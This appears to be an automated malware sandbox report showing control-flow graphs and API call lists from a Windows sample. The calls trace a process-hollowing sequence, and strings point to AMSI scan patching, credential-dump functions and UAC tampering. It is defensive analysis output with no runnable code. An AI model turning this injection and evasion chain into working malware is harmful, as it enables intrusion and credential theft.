2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf2ee0 call 2cf2f08 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 GetThreadContext 6105->6215 6214->6215 6215->6060 6323 2d0960f-2d09872 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2d08400 6215->6323 6396 2d09878-2d099e1 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2d08670 6323->6396 6397 2d09b7f-2d09beb call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 6323->6397 6487 2d099e3-2d09a09 call 2d07a2c 6396->6487 6488 2d09a0b-2d09a77 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 6396->6488 6424 2d09bf0-2d09d70 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2d07a2c 6397->6424 6424->6060 6528 2d09d76-2d09e6f call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2d08c80 6424->6528 6495 2d09a7c-2d09b73 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2d07a2c 6487->6495 6488->6495 6567 2d09b78-2d09b7d 6495->6567 6579 2d09e71-2d09ebe call 2d08b78 call 2d08b6c 6528->6579 6580 2d09ec3-2d0a61b call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2d07d78 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2d07d78 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 SetThreadContext NtResumeThread call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf2c2c call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2d0894c * 3 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 6528->6580 6567->6424 6579->6580 6805 2d0a620-2d0a8b2 call 2d0894c * 2 call 2cf4860 call 2cf49a0 call 2cf47ec call 2cf49a0 call 2d0894c call 2cf4860 call 2cf49a0 call 2cf47ec call 2cf49a0 call 2d0894c * 5 call 2cf4860 call 2cf49a0 call 2cf47ec call 2cf49a0 call 2d0894c call 2cf4860 call 2cf49a0 call 2cf47ec call 2cf49a0 call 2d0894c call 2cf4860 call 2cf49a0 call 2cf47ec call 2cf49a0 call 2d0894c call 2cf4860 call 2cf49a0 call 2cf47ec call 2cf49a0 call 2d0894c call 2d08080 call 2d0894c * 2 6580->6805 6805->6060
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D089D0: FreeLibrary.KERNEL32(75470000,00000000,00000000,00000000,00000000,02D7738C,Function_0000662C,00000004,02D7739C,02D7738C,05F5E103,00000040,02D773A0,75470000,00000000,00000000), ref: 02D08AAA
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D08788: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02D08814
                                                                                                                                                                                                                                                                                                                                                      • GetThreadContext.KERNEL32(00000908,02D77424,ScanString,02D773A8,02D0A93C,UacInitialize,02D773A8,02D0A93C,ScanBuffer,02D773A8,02D0A93C,ScanBuffer,02D773A8,02D0A93C,UacInitialize,02D773A8), ref: 02D09602
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D08400: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02D08471
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D08670: NtUnmapViewOfSection.NTDLL(?,?), ref: 02D086D5
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D07A2C: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02D07A9F
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D07D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02D07DEC
                                                                                                                                                                                                                                                                                                                                                      • SetThreadContext.KERNEL32(00000908,02D77424,ScanBuffer,02D773A8,02D0A93C,ScanString,02D773A8,02D0A93C,Initialize,02D773A8,02D0A93C,00000910,0036EFF8,02D774FC,00000004,02D77500), ref: 02D0A317
                                                                                                                                                                                                                                                                                                                                                      • NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(00000908,00000000,00000908,02D77424,ScanBuffer,02D773A8,02D0A93C,ScanString,02D773A8,02D0A93C,Initialize,02D773A8,02D0A93C,00000910,0036EFF8,02D774FC), ref: 02D0A324
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D0894C: LoadLibraryW.KERNEL32(bcrypt,?,00000908,00000000,02D773A8,02D0A587,ScanString,02D773A8,02D0A93C,ScanBuffer,02D773A8,02D0A93C,Initialize,02D773A8,02D0A93C,UacScan), ref: 02D08960
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D0894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02D0897A
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D0894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000908,00000000,02D773A8,02D0A587,ScanString,02D773A8,02D0A93C,ScanBuffer,02D773A8,02D0A93C,Initialize), ref: 02D089B6
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: LibraryMemoryThreadVirtual$ContextFree$AddressAllocateCreateLoadProcProcessReadResumeSectionUnmapUserViewWrite
                                                                                                                                                                                                                                                                                                                                                      • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 2388221946-51457883
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 908e1b370ef5455a2d5f394744fcbc82045d4a0ea041782e59907dd48d073680
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 95865f8efb960aff6ad25233d5bec30f8ded80a517709585b4e4efe78cb70fb5
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 908e1b370ef5455a2d5f394744fcbc82045d4a0ea041782e59907dd48d073680
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A3E2EE35F406199BDBA5FB64E8C1BCF73BAAF84300F5041A1A705AB364DA30AE49DF51
                                                                                                                                                                                                                                                                                                                                                      Function 02D08D6E Relevance: 45.4, APIs: 3, Strings: 22, Instructions: 1605threadCOMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                                                                                      control_flow_graph 6883 2d08d6e-2d08d73 6885 2d08d78-2d08d7d 6883->6885 6885->6885 6886 2d08d7f-2d08e66 call 2cf4990 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 6885->6886 6917 2d0a8b7-2d0a921 call 2cf4500 * 2 call 2cf4c60 call 2cf4500 call 2cf44dc call 2cf4500 * 2 6886->6917 6918 2d08e6c-2d08f47 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 6886->6918 6918->6917 6962 2d08f4d-2d09275 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf30d4 * 2 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4de0 call 2cf4df0 call 2d08788 6918->6962 7071 2d09277-2d092e3 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 6962->7071 7072 2d092e8-2d09609 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf46d4 * 2 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf2ee0 call 2cf2f08 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 GetThreadContext 6962->7072 7071->7072 7072->6917 7180 2d0960f-2d09872 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2d08400 7072->7180 7253 2d09878-2d099e1 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2d08670 7180->7253 7254 2d09b7f-2d09beb call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 7180->7254 7344 2d099e3-2d09a09 call 2d07a2c 7253->7344 7345 2d09a0b-2d09a77 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 7253->7345 7281 2d09bf0-2d09d70 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2d07a2c 7254->7281 7281->6917 7385 2d09d76-2d09e6f call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2d08c80 7281->7385 7352 2d09a7c-2d09b7d call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2d07a2c 7344->7352 7345->7352 7352->7281 7436 2d09e71-2d09ebe call 2d08b78 call 2d08b6c 7385->7436 7437 2d09ec3-2d0a8b2 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2d07d78 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2d07d78 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 SetThreadContext NtResumeThread call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf2c2c call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2d0894c * 3 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2d0894c * 2 call 2cf4860 call 2cf49a0 call 2cf47ec call 2cf49a0 call 2d0894c call 2cf4860 call 2cf49a0 call 2cf47ec call 2cf49a0 call 2d0894c * 5 call 2cf4860 call 2cf49a0 call 2cf47ec call 2cf49a0 call 2d0894c call 2cf4860 call 2cf49a0 call 2cf47ec call 2cf49a0 call 2d0894c call 2cf4860 call 2cf49a0 call 2cf47ec call 2cf49a0 call 2d0894c call 2cf4860 call 2cf49a0 call 2cf47ec call 2cf49a0 call 2d0894c call 2d08080 call 2d0894c * 2 7385->7437 7436->7437 7437->6917
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D089D0: FreeLibrary.KERNEL32(75470000,00000000,00000000,00000000,00000000,02D7738C,Function_0000662C,00000004,02D7739C,02D7738C,05F5E103,00000040,02D773A0,75470000,00000000,00000000), ref: 02D08AAA
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D08788: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02D08814
                                                                                                                                                                                                                                                                                                                                                      • GetThreadContext.KERNEL32(00000908,02D77424,ScanString,02D773A8,02D0A93C,UacInitialize,02D773A8,02D0A93C,ScanBuffer,02D773A8,02D0A93C,ScanBuffer,02D773A8,02D0A93C,UacInitialize,02D773A8), ref: 02D09602
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D08400: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02D08471
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D08670: NtUnmapViewOfSection.NTDLL(?,?), ref: 02D086D5
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D07A2C: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02D07A9F
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: MemoryVirtual$AllocateContextCreateFreeLibraryProcessReadSectionThreadUnmapUserView
                                                                                                                                                                                                                                                                                                                                                      • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 3386062106-51457883
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 5b9e0ed12ba40916369d8b83e126ee7c68f68c62a5360e370e2ed9e8ac0c96b9
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 824d94483d28141ac6c6aa5eea8f8504cf30b4b35dbc9f925cfcd8e9b9f6036b
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5b9e0ed12ba40916369d8b83e126ee7c68f68c62a5360e370e2ed9e8ac0c96b9
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FBE2EE35F406199BDBA5FB64E8C1BCF73BAAF84300F5041A1A705AB364DA30AE49DF51
                                                                                                                                                                                                                                                                                                                                                      Function 02CF5ACC Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 184registrystringlibraryCOMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                                                                                      control_flow_graph 10945 2cf5acc-2cf5b0d GetModuleFileNameA RegOpenKeyExA 10946 2cf5b4f-2cf5b92 call 2cf5908 RegQueryValueExA 10945->10946 10947 2cf5b0f-2cf5b2b RegOpenKeyExA 10945->10947 10952 2cf5bb6-2cf5bd0 RegCloseKey 10946->10952 10953 2cf5b94-2cf5bb0 RegQueryValueExA 10946->10953 10947->10946 10948 2cf5b2d-2cf5b49 RegOpenKeyExA 10947->10948 10948->10946 10950 2cf5bd8-2cf5c09 lstrcpynA GetThreadLocale GetLocaleInfoA 10948->10950 10954 2cf5c0f-2cf5c13 10950->10954 10955 2cf5cf2-2cf5cf9 10950->10955 10953->10952 10956 2cf5bb2 10953->10956 10958 2cf5c1f-2cf5c35 lstrlenA 10954->10958 10959 2cf5c15-2cf5c19 10954->10959 10956->10952 10960 2cf5c38-2cf5c3b 10958->10960 10959->10955 10959->10958 10961 2cf5c3d-2cf5c45 10960->10961 10962 2cf5c47-2cf5c4f 10960->10962 10961->10962 10963 2cf5c37 10961->10963 10962->10955 10964 2cf5c55-2cf5c5a 10962->10964 10963->10960 10965 2cf5c5c-2cf5c82 lstrcpynA LoadLibraryExA 10964->10965 10966 2cf5c84-2cf5c86 10964->10966 10965->10966 10966->10955 10967 2cf5c88-2cf5c8c 10966->10967 10967->10955 10968 2cf5c8e-2cf5cbe lstrcpynA LoadLibraryExA 10967->10968 10968->10955 10969 2cf5cc0-2cf5cf0 lstrcpynA LoadLibraryExA 10968->10969 10969->10955
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000105,02CF0000,02D1E790), ref: 02CF5AE8
                                                                                                                                                                                                                                                                                                                                                      • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02CF0000,02D1E790), ref: 02CF5B06
                                                                                                                                                                                                                                                                                                                                                      • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02CF0000,02D1E790), ref: 02CF5B24
                                                                                                                                                                                                                                                                                                                                                      • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02CF5B42
                                                                                                                                                                                                                                                                                                                                                      • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02CF5BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02CF5B8B
                                                                                                                                                                                                                                                                                                                                                      • RegQueryValueExA.ADVAPI32(?,02CF5D38,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02CF5BD1,?,80000001), ref: 02CF5BA9
                                                                                                                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,02CF5BD8,00000000,?,?,00000000,02CF5BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02CF5BCB
                                                                                                                                                                                                                                                                                                                                                      • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02CF5BE8
                                                                                                                                                                                                                                                                                                                                                      • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02CF5BF5
                                                                                                                                                                                                                                                                                                                                                      • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02CF5BFB
                                                                                                                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02CF5C26
                                                                                                                                                                                                                                                                                                                                                      • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02CF5C6D
                                                                                                                                                                                                                                                                                                                                                      • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02CF5C7D
                                                                                                                                                                                                                                                                                                                                                      • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02CF5CA5
                                                                                                                                                                                                                                                                                                                                                      • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02CF5CB5
                                                                                                                                                                                                                                                                                                                                                      • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02CF5CDB
                                                                                                                                                                                                                                                                                                                                                      • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02CF5CEB
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmpDownload File
